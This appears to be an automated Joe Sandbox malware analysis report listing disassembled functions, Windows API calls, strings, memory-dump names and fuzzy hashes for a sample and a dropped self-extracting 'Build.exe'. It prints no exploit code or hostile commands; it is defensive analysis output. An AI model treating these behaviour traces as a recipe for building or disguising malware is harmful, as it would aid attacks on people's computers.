Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction ID: 9e800adfe1d1d0706395e20c22446a71855d45b450e09d826a93db150e383cc6
Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
Instruction Fuzzy Hash: 17114C22B14F068AEB009B64EC442B973A4FB59758F840E31DA6D867A4DF38E1658790

Function 00007FF8BA2503BC Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF8BA2503E8
GetCurrentThreadId.KERNEL32 ref: 00007FF8BA2503F6
GetCurrentProcessId.KERNEL32 ref: 00007FF8BA250402
QueryPerformanceCounter.KERNEL32 ref: 00007FF8BA250412

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: a30b212504c3ea6b2c4515981d1649eccb2ffc9a0f80d390e0ca8da10d082644
Instruction ID: fcf8cfd0da123fc1e7d324278527488d5dfe92b50f182310594e2129a1aad6fa
Opcode Fuzzy Hash: a30b212504c3ea6b2c4515981d1649eccb2ffc9a0f80d390e0ca8da10d082644
Instruction Fuzzy Hash: 2A112E22B68F4189EB00DF64E8552B933A4F719798F440D72DF6D46BA4DF7CE5988340

Function 00007FF72B8F5B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B8F1760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F1793

_get_daylight.LIBCMT ref: 00007FF72B8F5C34
_get_daylight.LIBCMT ref: 00007FF72B8F5C45

Strings

?, xrefs: 00007FF72B8F5BC5

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction ID: 73d4ee4c47f8bfd6ef6ba82008a5ec7f449486a0703dce03ef4f8fbf4e4ff13d
Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
Instruction Fuzzy Hash: B841F912A1828255FB70A7299C413B9E690EBA0BE4FD44235EE5D06AF6DF3CE4618F50

Function 00007FF8BA2449B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE

_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF8BA244A86
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA244AE4

Strings

csm, xrefs: 00007FF8BA244B8A

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: abort$CreateFrameInfo
String ID: csm
API String ID: 2697087660-1018135373
Opcode ID: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
Instruction ID: a1d5a17aa86bceafa756fb287dc46e21ced2145a381fdfbbb37f225173f6d67f
Opcode Fuzzy Hash: 5e4671b1cbff3658d511699c3cf653202505efa909c7ec854f7fa1af4338784c
Instruction Fuzzy Hash: 64512932A1878286EA20EB2AE15026E77A4FB88FD0F100575DF8D07B55DF3CE464DB00

Function 00007FF72B8E9014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E9046

Part of subcall function 00007FF72B8EA948: HeapFree.KERNEL32(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA95E
Part of subcall function 00007FF72B8EA948: GetLastError.KERNEL32(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72B8DCBA5), ref: 00007FF72B8E9064

Strings

C:\Users\user\Desktop\iqA8j9yGcd.exe, xrefs: 00007FF72B8E9052

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\iqA8j9yGcd.exe
API String ID: 3580290477-2164264409
Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction ID: 844aa4fb982e8bc88a812d91af634d68c4687ec18510fa5b31eac185c387588f
Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
Instruction Fuzzy Hash: CB418132A0878285EB15BF699C400BDB394EB85BD0BD55035FA4D47BA5DE3CE4A18BA0

Function 00007FF72B8ECC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF72B8ECD4F
GetLastError.KERNEL32 ref: 00007FF72B8ECD71

Strings

U, xrefs: 00007FF72B8ECCFB

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: e570704cb0f9cca3d0c63bed77256de2895664ab802a335f9c5031bf13e2c607
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: 7041B322B18A8185DB21AF69E8443A9A7A0FB98784F804131EF4D877A8DF3CD411CF90

Function 00007FF8BA249F64 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24A062

Strings

void, xrefs: 00007FF8BA249FC4
void , xrefs: 00007FF8BA249FEC

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+
String ID: void$void
API String ID: 2943138195-3746155364
Opcode ID: 8ff03fe2419e3974eeb67dfb792afb4a9b9cae7aa7e23c2e8fbe84b60f38a0b9
Instruction ID: 8069896d906dc9bb0ff7eba466fdf6845d3e30040f7cd424e8ab3733a24d0c00
Opcode Fuzzy Hash: 8ff03fe2419e3974eeb67dfb792afb4a9b9cae7aa7e23c2e8fbe84b60f38a0b9
Instruction Fuzzy Hash: 5B313762E18B669CFB01CBA8E8411FC37B0BB48B88B441576EF4E62B59DF3CA144D750

Function 00007FF72B8EF5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF72B8EF5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF72B8EF64A

Strings

:, xrefs: 00007FF72B8EF60E

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
Instruction ID: 0b2a70341f1aa0d89077eb7aee2c9ab433a74b30ec8bff10f1d4663c2df75893
Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
Instruction Fuzzy Hash: 2821D562A186C182FB20AB19D84426DB3B1FB98B44FC54035EA8D476B4DF7CE554CFA1

Function 00007FF8BA2462EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BA246690: RtlPcToFileHeader.KERNEL32 ref: 00007FF8BA2466D4
Part of subcall function 00007FF8BA246690: RaiseException.KERNEL32 ref: 00007FF8BA24671A

RtlPcToFileHeader.KERNEL32 ref: 00007FF8BA24635F

Strings

Bad dynamic_cast!, xrefs: 00007FF8BA246312
Access violation - no RTTI data!, xrefs: 00007FF8BA2462EF

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: FileHeader$ExceptionRaise
String ID: Access violation - no RTTI data!$Bad dynamic_cast!
API String ID: 3685223789-3176238549
Opcode ID: 1336bfc7bd71620dddb987db4d102eb14b6a352524fa12ffdcc3c0e48972cdbe
Instruction ID: 24694211721b8d97a9973f8eaf11a2000bcac92c6381c141de076ccaa328fb22
Opcode Fuzzy Hash: 1336bfc7bd71620dddb987db4d102eb14b6a352524fa12ffdcc3c0e48972cdbe
Instruction Fuzzy Hash: 75017C61A29A8792EF40DB18E5512B86361FF80FD4F4050B2EF0E06669EF7CF948E700

Function 00007FF72B8DFD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF72B8DFD98
RaiseException.KERNEL32 ref: 00007FF72B8DFDD9

Strings

csm, xrefs: 00007FF72B8DFDC6

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: f1e6d0269ce32a913284007e1048f6963f5495266b85d49d552d711fb9601528
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: 58113032618B8282EB619F29F840259B7E4FB98B94F984231DF8D47768DF3CD561CB40

Function 00007FF8BA246690 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF8BA2466D4
RaiseException.KERNEL32 ref: 00007FF8BA24671A

Strings

csm, xrefs: 00007FF8BA246707

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
Instruction ID: 58c3695f7946c2b2eadff518806b82a6e71f9b345b6a23cfd1e3bb92f2e111a6
Opcode Fuzzy Hash: 51a2530866bc70b3fa6e7487cc130fe87b9602d28e5a22477376607ad08b6180
Instruction Fuzzy Hash: A2113A32A08B8282EB208F29E54026977A5FB88BC4F184271EF8D07B68DF3DD5558B40

Function 00007FF72B8F073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F076C
GetDriveTypeW.KERNEL32 ref: 00007FF72B8F07AC

Strings

:, xrefs: 00007FF72B8F0795

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: 7cfb3cf54fc58716a907265244fdf37c45b876f84bc14dfd2667e1ba02255490
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: 5701D46191C603C6FB20BF689C2127EA3A0EF69744FC40035E64C422A1DE3CE5208F64

Function 00007FF8BA24EDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8BA24F040: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FF8BA24F100
Part of subcall function 00007FF8BA24F040: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF8BA24EE05), ref: 00007FF8BA24F14F

Part of subcall function 00007FF8BA2469C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8BA2425CE), ref: 00007FF8BA2469CE

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA24EE2A

Strings

f, xrefs: 00007FF8BA24EE05
csm, xrefs: 00007FF8BA24EE0B

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwindabortterminate
String ID: csm$f
API String ID: 4189928240-629598281
Opcode ID: fb015faef4bf75acf24bdce02b26b27ea635390a237ea967a8c643fc2c3390a7
Instruction ID: 73eddec74b9b6fcfea20efde9f524af50c9d7bd9fd09d9250c4231366e2083e2
Opcode Fuzzy Hash: fb015faef4bf75acf24bdce02b26b27ea635390a237ea967a8c643fc2c3390a7
Instruction Fuzzy Hash: ACE09B31D0834381F7206B65B28117D26A4EF45FE4F1481B4DFC806646CF7ED9949601

Function 00007FF8BA2469DC Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF8BA246859,?,?,?,?,00007FF8BA24FF42,?,?,?,?,?), ref: 00007FF8BA2469FB
SetLastError.KERNEL32(?,?,?,00007FF8BA246859,?,?,?,?,00007FF8BA24FF42,?,?,?,?,?), ref: 00007FF8BA246A84

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
Instruction ID: a4f52af51b1ad67467a303afd1433ebb21cfb398eacf5c156aceaf118c0df3df
Opcode Fuzzy Hash: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
Instruction Fuzzy Hash: D1117520E19B1381FA149B2DAA1413532917F48FE0F0886B4DF6E077D5EE3CF441B640

Analysis Process: Build.exePID: 7440, Parent PID: 7388COMMON

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.6%
Total number of Nodes:	1743
Total number of Limit Nodes:	41

Executed Functions

Function 0043EA07 Relevance: 46.0, APIs: 22, Strings: 4, Instructions: 453
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043D5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0043D6C7

Part of subcall function 0043C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0043C5E5

SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,D72E4020,?,00000000,00000001), ref: 0043EB53
_wcslen.LIBCMT ref: 0043EB8D
_wcslen.LIBCMT ref: 0043EBA1
_wcslen.LIBCMT ref: 0043EBC6
GetFileAttributesW.KERNEL32(?), ref: 0043EC0C
DeleteFileW.KERNEL32(?), ref: 0043EC1E
_swprintf.LIBCMT ref: 0043EC43
GetFileAttributesW.KERNEL32(?), ref: 0043EC52
MoveFileW.KERNEL32(?,?), ref: 0043EC6B
MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0043EC7F
_wcslen.LIBCMT ref: 0043ECFA
_wcslen.LIBCMT ref: 0043ED03
SetWindowTextW.USER32(?,?), ref: 0043ED62

Strings

<br>, xrefs: 0043ECC4
Software\Microsoft\Windows\CurrentVersion, xrefs: 0043EE0B
ProgramFilesDir, xrefs: 0043EE36
%s.%d.tmp, xrefs: 0043EC36

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandStringsTextWindow_swprintf
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2983673336-312220925
Opcode ID: de808bff34bdc42d0982b48b1c6daf96baa1de75726e639fe2dd1d1c803c5ccc
Instruction ID: 765e21cf4588f91525b686a5acd8c0035021aad01f99dbedcd58efbf925fb25f
Opcode Fuzzy Hash: de808bff34bdc42d0982b48b1c6daf96baa1de75726e639fe2dd1d1c803c5ccc
Instruction Fuzzy Hash: 17F19372901248AADF21EFA1DC45EEF33BCAF09314F14142FF905D7191EB789A4A8B59

Function 0044037C Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 208
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0043290A: GetModuleHandleW.KERNEL32 ref: 00432937
Part of subcall function 0043290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00432949
Part of subcall function 0043290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00432973

Part of subcall function 0043C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0043C5E5

Part of subcall function 0043CCD9: OleInitialize.OLE32(00000000), ref: 0043CCF2
Part of subcall function 0043CCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0043CD29
Part of subcall function 0043CCD9: SHGetMalloc.SHELL32(0046C460), ref: 0043CD33

GetCommandLineW.KERNEL32 ref: 004403C9
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 004403F3
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00440404
UnmapViewOfFile.KERNEL32(00000000), ref: 00440455

Part of subcall function 0043FFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0043FFFE
Part of subcall function 0043FFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00440038

Part of subcall function 00431421: _wcslen.LIBCMT ref: 00431445

CloseHandle.KERNEL32(00000000), ref: 0044045C
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe,00000800), ref: 00440476
SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe), ref: 00440482
GetLocalTime.KERNEL32(?), ref: 0044048D
_swprintf.LIBCMT ref: 004404E1
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 004404F6
GetModuleHandleW.KERNEL32(00000000), ref: 004404FD
LoadIconW.USER32(00000000,00000064), ref: 00440514
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00440565
Sleep.KERNEL32(?), ref: 00440593
DeleteObject.GDI32 ref: 004405CC
DeleteObject.GDI32(?), ref: 004405DC
CloseHandle.KERNEL32 ref: 0044061F

Strings

sfxstime, xrefs: 004404F1
STARTDLG, xrefs: 0044055A
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 004404D2
C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe, xrefs: 0044046F, 00440474, 0044047C, 00440524
pPF, xrefs: 00440525
sfxname, xrefs: 0044047D
winrarsfxmappingfile.tmp, xrefs: 004403E7

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
